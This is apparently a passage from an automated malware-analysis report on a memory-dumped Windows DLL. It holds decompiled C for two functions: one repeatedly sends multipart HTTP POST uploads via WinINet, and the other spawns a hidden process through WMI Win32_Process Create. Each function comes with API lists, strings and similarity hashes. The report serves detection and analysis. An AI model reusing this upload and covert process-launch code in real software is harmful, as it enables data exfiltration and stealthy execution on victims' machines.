HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA598F
InternetCloseHandle.WININET(00000000), ref: 6ECA599A
InternetCloseHandle.WININET(00000000), ref: 6ECA59A5
InternetCloseHandle.WININET(00000000), ref: 6ECA59AC
GetTickCount.KERNEL32 ref: 6ECA59BD
Sleep.KERNEL32(00001388), ref: 6ECA59CC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA59D7

Strings

Connection: close, xrefs: 6ECA57AC
----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6ECA5819
----------%lu--, xrefs: 6ECA5834
POST, xrefs: 6ECA5776
Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6ECA587C
N, xrefs: 6ECA570C
Content-Length: %lu, xrefs: 6ECA585A
HTTP/1.1, xrefs: 6ECA5770

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
API String ID: 2546452625-2948876467
Opcode ID: 0f573105c592335c160c19649314f1601e207af58b87674b7cdcc6bb6326b625
Instruction ID: eca5b12124775ebb91bfd1d7e7ffc35456f1486dc8e17703585bd1463b9cead2
Opcode Fuzzy Hash: 0f573105c592335c160c19649314f1601e207af58b87674b7cdcc6bb6326b625
Instruction Fuzzy Hash: 3DA19EB0104306AFD7109FA8CC48F6F7BB8EB89719F004518FE469B241E774E8458F62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA56B3, Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 258
networkmemorysleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E6ECA56B3() {
				char* _t65;
				long _t81;
				void* _t94;
				intOrPtr _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				CHAR* _t108;
				int _t109;
				long _t110;
				long _t113;
				void* _t117;
				intOrPtr _t141;
				void* _t143;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				void* _t149;
				int _t151;
				intOrPtr _t152;
				void* _t154;
				void* _t156;

				while(1) {
					_t146 =  *((intOrPtr*)(_t154 + 0x40));
					 *(_t154 + 0x18) = 0x842a0000;
					if( *(_t146 + 0xc) != 0) {
						 *(_t154 + 0x18) = 0x84aa3300;
					}
					_t65 = M6ECB0518; // 0x0
					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
					 *(_t154 + 0x30) = _t149;
					if(_t149 == 0) {
						L28:
						if(GetTickCount() >= _t141) {
							L32:
							return  *((intOrPtr*)(_t154 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t154 + 0x34) = _t143;
					if(_t143 == 0) {
						L26:
						InternetCloseHandle(_t149);
						if( *(_t154 + 0x1c) != 0) {
							goto L32;
						}
						_t141 =  *((intOrPtr*)(_t154 + 0x38));
						goto L28;
					}
					_t117 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0);
					if(_t117 == 0) {
						L25:
						InternetCloseHandle(_t143);
						goto L26;
					}
					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t148 == 0) {
						L24:
						InternetCloseHandle(_t117);
						_t143 =  *(_t154 + 0x34);
						goto L25;
					}
					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
					_t154 = _t154 + 0xc;
					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
					_t151 = 0;
					 *((intOrPtr*)(_t154 + 0x24)) = 0;
					 *((intOrPtr*)(_t154 + 0x28)) = 0;
					 *(_t154 + 0x18) = 0;
					 *(_t154 + 0x30) = GetTickCount();
					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t145 != 0) {
						 *(_t154 + 0x34) = _t145;
						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
						_t26 = _t151 + 1; // 0x1
						_t108 = _t145 + _t26;
						 *(_t154 + 0x44) = _t108;
						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
						 *(_t154 + 0x34) = _t109;
						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
						_t156 = _t154 + 0x28;
						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
						_t154 = _t156 + 0xc;
						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
					}
					if(HttpSendRequestExA(_t117, 0, 0, 0, 0) == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t145 != 0) {
							HeapFree(GetProcessHeap(), 0, _t145);
						}
						HeapFree(GetProcessHeap(), 0, _t148);
						_t149 =  *(_t154 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
					_t94 = E6ECA54E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
					_t154 = _t154 + 0xc;
					_t152 =  *((intOrPtr*)(_t154 + 0x40));
					if(_t94 != _t151) {
						L19:
						HttpEndRequestA(_t117, 0, 0, 0);
						if( *(_t154 + 0x1c) != 0) {
							_t96 = E6ECA5540(_t117, _t152 + 0x2c);
							_t154 = _t154 + 8;
							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
						}
						goto L21;
					}
					_t97 = _t152 + 0x18;
					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
						L13:
						_t98 = _t152 + 0x20;
						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
							L15:
							_t99 = _t152 + 0x28;
							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
								L17:
								 *(_t154 + 0x30) =  *(_t154 + 0x18);
								_t101 = E6ECA54E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
								_t154 = _t154 + 0xc;
								if(_t101 ==  *(_t154 + 0x18)) {
									 *(_t154 + 0x1c) = 1;
								}
								goto L19;
							}
							_t102 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
							_t154 = _t154 + 0xc;
							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t103 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
						_t154 = _t154 + 0xc;
						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t105 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
					_t154 = _t154 + 0xc;
					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}

0x6eca56c0
0x6eca56c0
0x6eca56c8
0x6eca56d0
0x6eca56d2
0x6eca56d2
0x6eca56da
0x6eca56ee
0x6eca56f0
0x6eca56f6
0x6eca59bd
0x6eca59c5
0x6eca59f1
0x6eca59fc
0x6eca59fc
0x6eca59cc
0x00000000
0x6eca59cc
0x6eca570c
0x6eca5714
0x6eca5720
0x6eca572c
0x6eca573e
0x6eca5754
0x6eca5756
0x6eca575c
0x6eca59ab
0x6eca59ac
0x6eca59b7
0x00000000
0x00000000
0x6eca59b9
0x00000000
0x6eca59b9
0x6eca5782
0x6eca5786
0x6eca59a4
0x6eca59a5
0x00000000
0x6eca59a5
0x6eca57a2
0x6eca57a6
0x6eca5999
0x6eca599a
0x6eca59a0
0x00000000
0x6eca59a0
0x6eca57b7
0x6eca57bd
0x6eca57c8
0x6eca57ce
0x6eca57d0
0x6eca57d4
0x6eca57d8
0x6eca57e7
0x6eca57f8
0x6eca5805
0x6eca5809
0x6eca581f
0x6eca582e
0x6eca5830
0x6eca5830
0x6eca583a
0x6eca583e
0x6eca5844
0x6eca584e
0x6eca5860
0x6eca5866
0x6eca5871
0x6eca5882
0x6eca5888
0x6eca5893
0x6eca5893
0x6eca58aa
0x6eca59e2
0x6eca59e8
0x6eca59e8
0x6eca5971
0x6eca5973
0x6eca597f
0x6eca597f
0x6eca598f
0x6eca5995
0x00000000
0x6eca5995
0x6eca58bb
0x6eca58bf
0x6eca58c4
0x6eca58c9
0x6eca58cd
0x6eca594c
0x6eca5953
0x6eca595e
0x6eca5965
0x6eca596a
0x6eca596d
0x6eca596d
0x00000000
0x6eca595e
0x6eca58d3
0x6eca58d6
0x6eca58eb
0x6eca58ef
0x6eca58f2
0x6eca5907
0x6eca590b
0x6eca590e
0x6eca5923
0x6eca5932
0x6eca5936
0x6eca593b
0x6eca5942
0x6eca5944
0x6eca5944
0x00000000
0x6eca5942
0x6eca5916
0x6eca591b
0x6eca5921
0x00000000
0x00000000
0x00000000
0x6eca5921
0x6eca58fa
0x6eca58ff
0x6eca5905
0x00000000
0x00000000
0x00000000
0x6eca5905
0x6eca58de
0x6eca58e3
0x6eca58e9
0x00000000
0x00000000
0x00000000
0x6eca58e9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6ECA56E8
InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6ECA5714
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6ECA5720
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6ECA572C
InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6ECA574E
HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6ECA577C
GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA5793
HeapAlloc.KERNEL32(00000000), ref: 6ECA57A0
wsprintfA.USER32 ref: 6ECA57B7
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA57C8
GetTickCount.KERNEL32 ref: 6ECA57DC
RtlRandom.NTDLL(?), ref: 6ECA57EB
GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA57FC
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5803
wsprintfA.USER32 ref: 6ECA5823
wsprintfA.USER32 ref: 6ECA583E
wsprintfA.USER32 ref: 6ECA5860
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5871
wsprintfA.USER32 ref: 6ECA5882
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5893
HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA58A2
HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6ECA5953
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5978
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA597F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5988
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA598F
InternetCloseHandle.WININET(00000000), ref: 6ECA599A
InternetCloseHandle.WININET(00000000), ref: 6ECA59A5
InternetCloseHandle.WININET(00000000), ref: 6ECA59AC
GetTickCount.KERNEL32 ref: 6ECA59BD
Sleep.KERNEL32(00001388), ref: 6ECA59CC

Strings

Connection: close, xrefs: 6ECA57AC
----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6ECA5819
----------%lu--, xrefs: 6ECA5834
POST, xrefs: 6ECA5776
Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6ECA587C
N, xrefs: 6ECA570C
Content-Length: %lu, xrefs: 6ECA585A
HTTP/1.1, xrefs: 6ECA5770

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
API String ID: 1438124730-2948876467
Opcode ID: 4b2f91dab76e42ee9f3d78b147a56072f3cddfe2d16a6c5aee3a2cb0712d2c9a
Instruction ID: 6fb0b8c3c15e842635d9a096d63f7f9a1fe857e1847e495107e00b8289ed246c
Opcode Fuzzy Hash: 4b2f91dab76e42ee9f3d78b147a56072f3cddfe2d16a6c5aee3a2cb0712d2c9a
Instruction Fuzzy Hash: DB917EB1504706AFD7109FA8CD49FAF7BB8EB88719F104508FE469B281E770E8458F66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA29D0, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 330
memorycomstringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E6ECA29D0() {
				intOrPtr _v56;
				void* _v76;
				intOrPtr* _v100;
				long _v116;
				char _v120;
				intOrPtr _v132;
				intOrPtr* _v140;
				intOrPtr _v160;
				intOrPtr _v168;
				long _v176;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v196;
				intOrPtr _v204;
				char _v208;
				char _v212;
				intOrPtr* _v224;
				intOrPtr _v228;
				intOrPtr* _v236;
				intOrPtr* _v240;
				void* _v248;
				intOrPtr* _v252;
				intOrPtr _v256;
				intOrPtr* _v264;
				intOrPtr* _v272;
				long _v276;
				char _v280;
				short _v284;
				char _v288;
				short _v292;
				intOrPtr* _v300;
				intOrPtr* _v304;
				void* _v308;
				void* _v312;
				char _v316;
				intOrPtr* _v324;
				intOrPtr* _v336;
				long _v352;
				char _v356;
				intOrPtr* _v360;
				intOrPtr _v376;
				intOrPtr* _v380;
				intOrPtr _v384;
				intOrPtr _v392;
				intOrPtr* _v396;
				char* _t83;
				void* _t85;
				intOrPtr* _t86;
				void* _t87;
				intOrPtr* _t88;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t98;
				intOrPtr* _t99;
				void* _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t107;
				intOrPtr* _t110;
				intOrPtr* _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				short _t127;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t140;
				intOrPtr _t142;
				intOrPtr* _t145;
				void* _t148;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t154;
				short _t157;
				char _t158;
				void* _t208;
				intOrPtr _t211;
				intOrPtr* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				intOrPtr* _t219;
				void* _t220;

				_v56 = 0;
				__imp__CoInitializeEx(0, 6);
				_t83 =  &_v76;
				_v76 = 0;
				__imp__CoCreateInstance(0x6ecadf9c, 0, 1, 0x6ecadecc, _t83);
				if(_t83 < 0) {
					return 0;
				} else {
					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
					_t154 = __imp__#2;
					_v116 = 0;
					_t85 =  *_t154(_t158, _t208, _t153);
					_t215 = _t85;
					_t86 = _v100;
					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120);
					__imp__#6(_t215);
					if(_t87 >= 0) {
						_t91 = _v160;
						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t91 >= 0) {
							_v176 = 0;
							_t94 =  *_t154(L"Win32_Process");
							_push(0);
							_push( &_v180);
							_push(0);
							_t211 = _t94;
							_t95 = _v196;
							_push(0);
							_push(_t211);
							_push(_t95);
							_v168 = _t211;
							if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))() >= 0) {
								_v208 = 0;
								_t98 =  *_t154(L"Win32_ProcessStartup");
								_t216 = _t98;
								_t99 = _v224;
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
								__imp__#6(_t216);
								if(_t101 >= 0) {
									_t104 = _v240;
									_push( &_v248);
									_v248 = 0;
									_push(0);
									_push(_t104);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))() >= 0) {
										_t212 = __imp__#8;
										 *_t212( &_v208);
										_t110 = _v264;
										_v212 = 2;
										_v204 = 1;
										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0);
										_t113 = _v272;
										_push(0);
										_push( &_v280);
										_push(0);
										_v280 = 0;
										_push(L"Create");
										_push(_t113);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))() >= 0) {
											_t118 = _v300;
											_push( &_v312);
											_v312 = 0;
											_push(0);
											_push(_t118);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
												_t217 = E6ECAA360(_v228, 0, 0);
												if(_t217 != 0) {
													_t127 = lstrlenW(_t217) + 2;
													__imp__#4(_t217, _t127);
													_t157 = _t127;
													HeapFree(GetProcessHeap(), 0, _t217);
													if(_t157 != 0) {
														 *_t212( &_v288);
														_v292 = 8;
														_t132 = _v336;
														_v284 = _t157;
														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
														_t135 = _v256;
														_t213 = 0;
														if(_v256 != 0) {
															_t148 = E6ECAA360(_t135, 0, 0);
															_t220 = _t148;
															if(_t220 != 0) {
																__imp__#2(_t220);
																_t213 = _t148;
																if(_t213 != 0) {
																	_t151 = _v360;
																	_v316 = 8;
																	_v308 = _t213;
																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
																}
																HeapFree(GetProcessHeap(), 0, _t220);
															}
														}
														__imp__#8( &_v280);
														_t137 = _v360;
														_v276 = _v352;
														_v284 = 9;
														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0);
														_v352 = 0;
														__imp__#2(L"Create");
														_t218 = _t139;
														_t140 = _v380;
														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
														_t219 = __imp__#6;
														_v376 = _t142;
														 *_t219(_t218);
														 *_t219(_t157);
														if(_t213 != 0) {
															 *_t219(_t213);
														}
														if(_v384 >= 0) {
															_t145 = _v396;
															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
															_v392 = 1;
														}
													}
												}
												_t124 = _v324;
												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
											}
											_t121 = _v312;
											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
										}
										_t116 = _v304;
										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
										_t211 = _v284;
									}
									_t107 = _v252;
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
								}
								_t102 = _v236;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
							}
							__imp__#6(_t211);
						}
						_t92 = _v192;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
					}
					_t88 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
					return _v132;
				}
			}

0x6eca29dc
0x6eca29e0
0x6eca29e6
0x6eca29f8
0x6eca29fc
0x6eca2a04
0x6eca2d42
0x6eca2a0a
0x6eca2a0a
0x6eca2a11
0x6eca2a19
0x6eca2a1d
0x6eca2a29
0x6eca2a2b
0x6eca2a37
0x6eca2a3c
0x6eca2a44
0x6eca2a4a
0x6eca2a59
0x6eca2a61
0x6eca2a6c
0x6eca2a70
0x6eca2a72
0x6eca2a77
0x6eca2a78
0x6eca2a79
0x6eca2a7b
0x6eca2a81
0x6eca2a82
0x6eca2a83
0x6eca2a87
0x6eca2a8f
0x6eca2a9a
0x6eca2a9e
0x6eca2aa7
0x6eca2aa9
0x6eca2ab5
0x6eca2aba
0x6eca2ac2
0x6eca2ac8
0x6eca2ad0
0x6eca2ad1
0x6eca2ad7
0x6eca2ad8
0x6eca2ae0
0x6eca2ae6
0x6eca2af1
0x6eca2af3
0x6eca2afd
0x6eca2b08
0x6eca2b1b
0x6eca2b1d
0x6eca2b21
0x6eca2b26
0x6eca2b27
0x6eca2b28
0x6eca2b2e
0x6eca2b33
0x6eca2b3b
0x6eca2b41
0x6eca2b49
0x6eca2b4a
0x6eca2b50
0x6eca2b51
0x6eca2b59
0x6eca2b6b
0x6eca2b72
0x6eca2b7f
0x6eca2b84
0x6eca2b8c
0x6eca2b95
0x6eca2b9d
0x6eca2bb5
0x6eca2bc2
0x6eca2bc7
0x6eca2bcc
0x6eca2bdb
0x6eca2bdd
0x6eca2be1
0x6eca2be5
0x6eca2bea
0x6eca2bef
0x6eca2bf6
0x6eca2bf9
0x6eca2bff
0x6eca2c03
0x6eca2c05
0x6eca2c0f
0x6eca2c1a
0x6eca2c29
0x6eca2c29
0x6eca2c34
0x6eca2c34
0x6eca2bf6
0x6eca2c3f
0x6eca2c49
0x6eca2c4e
0x6eca2c5d
0x6eca2c6d
0x6eca2c74
0x6eca2c78
0x6eca2c8e
0x6eca2c90
0x6eca2c9d
0x6eca2ca0
0x6eca2ca6
0x6eca2caa
0x6eca2cad
0x6eca2cb1
0x6eca2cb4
0x6eca2cb4
0x6eca2cba
0x6eca2cbc
0x6eca2cc6
0x6eca2cc8
0x6eca2cc8
0x6eca2cba
0x6eca2b9d
0x6eca2cd0
0x6eca2cda
0x6eca2cda
0x6eca2cdc
0x6eca2ce6
0x6eca2ce6
0x6eca2ce8
0x6eca2cf2
0x6eca2cf4
0x6eca2cf4
0x6eca2cf8
0x6eca2d02
0x6eca2d02
0x6eca2d04
0x6eca2d0e
0x6eca2d0e
0x6eca2d11
0x6eca2d11
0x6eca2d17
0x6eca2d21
0x6eca2d21
0x6eca2d23
0x6eca2d2d
0x6eca2d3a
0x6eca2d3a

APIs

CoInitializeEx.OLE32(00000000,00000006), ref: 6ECA29E0
CoCreateInstance.OLE32(6ECADF9C,00000000,00000001,6ECADECC,?), ref: 6ECA29FC
SysAllocString.OLEAUT32(00000000), ref: 6ECA2A1D
SysFreeString.OLEAUT32(00000000), ref: 6ECA2A3C
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6ECA2A59
SysAllocString.OLEAUT32(Win32_Process), ref: 6ECA2A70
SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6ECA2A9E
SysFreeString.OLEAUT32(00000000), ref: 6ECA2ABA
VariantInit.OLEAUT32(?), ref: 6ECA2AF1

Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
Part of subcall function 6ECAA360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
Part of subcall function 6ECAA360: HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9

lstrlenW.KERNEL32(00000000), ref: 6ECA2B79
SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6ECA2B84
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2B8E
HeapFree.KERNEL32(00000000), ref: 6ECA2B95
PathQuoteSpacesW.SHLWAPI(00000000), ref: 6ECA2BAA
VariantInit.OLEAUT32(?), ref: 6ECA2BB5
SysAllocString.OLEAUT32(00000000), ref: 6ECA2BF9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2C2D
HeapFree.KERNEL32(00000000), ref: 6ECA2C34
VariantInit.OLEAUT32(?), ref: 6ECA2C3F
SysAllocString.OLEAUT32(Create), ref: 6ECA2C78
SysFreeString.OLEAUT32(00000000), ref: 6ECA2CAA
SysFreeString.OLEAUT32(00000000), ref: 6ECA2CAD
SysFreeString.OLEAUT32(00000000), ref: 6ECA2CB4
SysFreeString.OLEAUT32(00000000), ref: 6ECA2D11

Strings

CurrentDirectory, xrefs: 6ECA2C23
Win32_Process, xrefs: 6ECA2A67
ShowWindow, xrefs: 6ECA2B12
Create, xrefs: 6ECA2B2E, 6ECA2C6F
Win32_ProcessStartup, xrefs: 6ECA2A95
CommandLine, xrefs: 6ECA2BD2
ProcessStartupInformation, xrefs: 6ECA2C64

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
API String ID: 2088563290-1030916257
Opcode ID: 23e0cfc4039d2dc57ef611bff1dafa45e657b1ddfd2bec5ee4b151cde6bb4a57
Instruction ID: 3e4f4c6cadfc62bb0588b66a9d37de7552563fc1f176ce584280e6a21b44b175
Opcode Fuzzy Hash: 23e0cfc4039d2dc57ef611bff1dafa45e657b1ddfd2bec5ee4b151cde6bb4a57
Instruction Fuzzy Hash: EEB10571604706AFC704DFA9C884D6BBBEDEFC9748F11490CFA4987210EA35E941CB62

Uniqueness

Uniqueness Score: -1.00%

